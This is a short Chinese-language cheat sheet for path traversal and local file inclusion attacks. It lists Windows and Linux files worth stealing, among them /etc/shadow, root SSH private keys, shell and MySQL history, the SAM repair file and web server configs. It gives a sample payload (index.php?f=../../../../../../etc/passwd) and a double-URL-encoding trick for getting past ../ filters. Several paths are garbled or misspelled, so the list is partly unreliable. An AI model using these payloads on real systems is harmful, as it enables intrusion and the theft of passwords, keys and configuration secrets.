Windows: C:oot.ini #查看系统版本 C:WindowsSystem32inetsrvMetaBase.xml #IIS配置文件 C:Windows epairsam #存储系统初次安装的密码 C:Program Filesmysqlmy.ini #Mysql配置 C:Program Filesmysqldatamysqluser.MYD #Mysql root C:Windowsphp.ini #php配置信息 C:Windowsmy.ini #Mysql配置信息 ... Linux: /etc/passwd #查看用户文件 /etc/shadow #查看密码文件,如果能读取该文件说明是root权限 /etc/my.cnf /etc/httpd/conf/httpd.conf #查看apache的配置文件 /root/.bash_history #查看历史命令 /root/.mysql_history #mysql历史命令记录文件 /var/lib/mlocate/mlocate.db #本地所有文件信息 /etc/ssh/sshd_config #ssh配置文件,如果对外开放可看到端口 /proc/self/fd/fd[0-9]*(文件标识符) /proc/mounts /porc/config.gz /root/.ssh/authorized_keys /root/.ssh/id_rsa /root/.ssh/id_ras.keystore /root/.ssh/known_hosts 程序的配置文件 apache: /etc/httpd/conf/httpd.conf /etc/apache2/httpd.conf /etc/apache2/apache2.conf
/WEB-INF/web.xml nginx: /etc/nginx/nginx.conf /usr/local/nginx/conf/nginx.conf /usr/local/etc/nginx/nginx.conf redis: /etc/redis.conf 使用示例:index.php?f=../../../../../../etc/passwd
绕过../:构造 /.%252e/.%252e/.%252e/ , %25对应的是%,%2e对应的是 .